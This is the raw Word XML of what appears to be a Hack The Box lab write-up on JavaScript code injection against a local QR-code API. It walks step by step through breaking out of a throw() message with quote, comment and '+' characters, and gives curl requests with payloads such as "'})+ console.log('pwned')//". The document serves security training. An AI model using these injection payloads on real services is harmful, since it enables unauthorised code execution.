          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"}' http://localhost:5000/api/service/generate</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="09AF38FC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 </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3BDB3696" wp14:textId="77777777"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cccccc" w:fill="cccccc"/>
        <w:spacing w:line="120" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">{"message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">The input \";\" contains the following invalid characters: [;]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"} </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="44EAFD9C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4B94D5A5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D509580" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="656"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Code Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F6AF4D4" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now for the code injection we can see that the error message is taken as it is without filtering by $text</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3DEEC669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A325FCE" wp14:editId="7777777">
                <wp:extent cx="4512015" cy="89782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094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512015" cy="897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1D9EAB4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3" style="width:355.28pt;height:70.70pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" o:spid="_x0000_s3" stroked="false" type="#_x0000_t75">
                <v:imagedata o:title="" r:id="rId13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589208A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This means if we send something like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">{ "text": ";" }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656B9AB" wp14:textId="77777777"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C48EFEF" wp14:editId="7777777">
                <wp:extent cx="4607265" cy="9680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9491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07264" cy="968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39802A7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4" style="width:362.78pt;height:76.22pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" o:spid="_x0000_s4" stroked="false" type="#_x0000_t75">
                <v:imagedata o:title="" r:id="rId14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4EF25CE" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">As you see the inputted text is send as it is wihtou any sanitization which means we could send a single quotation mark ‘ to break the query.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6E19A2B4" wp14:textId="77777777"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Here is important to not break the code and to do so we can use the // which is the comment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="409B87DC" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="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So start by adding the ‘ to close the code(this should give you a error) like:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">throw({message: 'The input "'" contains the following invalid characters: [']', statusCode: 403})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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="45FB0818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049F31CB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0629DAC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Next you can add the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> comment which is supposed to break the code:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3BB821BE" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14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throw({message: 'The input "'//" contains the following invalid characters: [']', statusCode: 403})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73EE5FC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Next we need to close the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  and we can use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">‘})//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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700CF30D" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14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throw { message: 'The input "' }; //" contains the following invalid characters: [']', statusCode: 403, })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0DE4803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Now we can start to simulate the error with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">', statusCode: 403})//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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7C057902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throw({   message: 'The input "'})//" contains the following invalid characters: [']',   statusCode: 403,});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1F4F8EA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Here since the response is handled in JSON format we need to escape the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. If we send a normal code like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "text": "'}); console.log('pwned')//" }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> the comment should not affect the command and be placed on the outside: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1753E9C2" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14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throw { message: 'The input "' };console.log("pwned"); //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C940FAA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Resulting in sending the full query like:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1588F192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</w:rPr>
        <w:t xml:space="preserve">yovecio@htb[/htb]$ curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer eyJhbGciOiJIUzI1N...SNIP...9R6zeoubrQTbUiThBpeQD7_DWibgo" -d "{ \"text\": \"'}); console.log('pwned')//\" }" http://localhost:5000/api/service/generate{"messag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">e":"Could not generate QR code."}</w:t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</w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5B3683F0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This should throw an error even if we check in the Debugger the value is passed correctly:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="53128261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2A915B2E" wp14:editId="7777777">
                <wp:extent cx="5940425" cy="33916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021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91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A0ECD7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5" style="width:467.75pt;height:267.06pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" o:spid="_x0000_s5" stroked="false" type="#_x0000_t75">
                <v:imagedata o:title="" r:id="rId15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563AD40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The reason it is not working is because the ; in JS is seen as a new line separator so to avoid this problem use the + instead so the command will be injected in the same line..</w:t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62486C05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22C621F4" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Resulting with the final string as(; replaced with + to avoid new line /n feed):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3DDC1169" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "text": "'})+ console.log('pwned')//" }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F658116" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CURL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="374D5BC8" wp14:textId="77777777" w14:paraId="0FB78278">
      <w:pPr>
        <w:spacing/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="374D5BC8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer eyJhbGciOiJIUzI1N...SNIP...9R6zeoubrQTbUiThBpeQD7_DWibgo" -d "{ \"text\": \" '}); console.log('pwned')// \" }" http://localhost:5000/api/service/generate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/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w="11906" w:h="16838" w:orient="landscape"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
      <w:cols w:equalWidth="1" w:space="708" w:num="1" w:sep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34CE0A41" wp14:textId="77777777"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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62EBF3C5" wp14:textId="77777777"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1FC39945" wp14:textId="77777777"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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0562CB0E" wp14:textId="77777777"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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6D98A12B" wp14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="68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left="709" w:hanging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left="1429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49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69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589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09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29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49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69" w:hanging="180"/>
      </w:pPr>
      <w:rPr/>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:nsid w:val="5df2f310"/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  <w14:docId w14:val="37253AC4"/>
  <w15:docId w15:val="{CBE889AD-2246-4A6F-8712-906246669A30}"/>
  <w:rsids>
    <w:rsidRoot w:val="374D5BC8"/>
    <w:rsid w:val="374D5BC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before="0" w:beforeAutospacing="0" w:after="200" w:after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before="480" w:after="20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before="360" w:after="20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before="320" w:after="20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before="320" w:after="20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before="320" w:after="20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before="320" w:after="20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before="320" w:after="20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before="320" w:after="20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before="320" w:after="20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before="300" w:after="2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before="200" w:after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left="720" w:righ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left="720" w:righ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left="0" w:right="0" w:firstLine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left="283" w:right="0" w:firstLine="0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left="567" w:right="0" w:firstLine="0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left="850" w:right="0" w:firstLine="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left="1134" w:right="0" w:firstLine="0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left="1417" w:right="0" w:firstLine="0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left="1701" w:right="0" w:firstLine="0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left="1984" w:right="0" w:firstLine="0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left="2268" w:right="0" w:firstLine="0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header" Target="header1.xml" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png" Id="rId15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HyperlinksChanged>false</ap:HyperlinksChanged>
  <ap:ScaleCrop>false</ap:ScaleCrop>
  <ap:SharedDoc>false</ap:SharedDoc>
  <ap:Template>Normal.dotm</ap:Template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revision>3</revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-23T07:32:12.6196671Z</dcterms:modified>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>